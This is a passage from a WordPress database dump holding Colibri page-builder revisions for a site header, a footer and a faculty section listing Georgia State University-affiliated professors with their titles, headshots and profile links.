gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 11:02:56','2023-10-13 15:02:56','',25,'https://gsudice.dataconn.net/?p=1801',0,'revision','',0),(1802,1,'2023-10-13 11:02:56','2023-10-13 15:02:56','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 11:02:56','2023-10-13 15:02:56','',29,'https://gsudice.dataconn.net/?p=1802',0,'revision','',0),(1803,1,'2023-10-13 11:02:56','2023-10-13 15:02:56','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 11:02:56','2023-10-13 15:02:56','',28,'https://gsudice.dataconn.net/?p=1803',0,'revision','',0),(1805,1,'2023-10-13 11:04:29','2023-10-13 15:04:29','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"na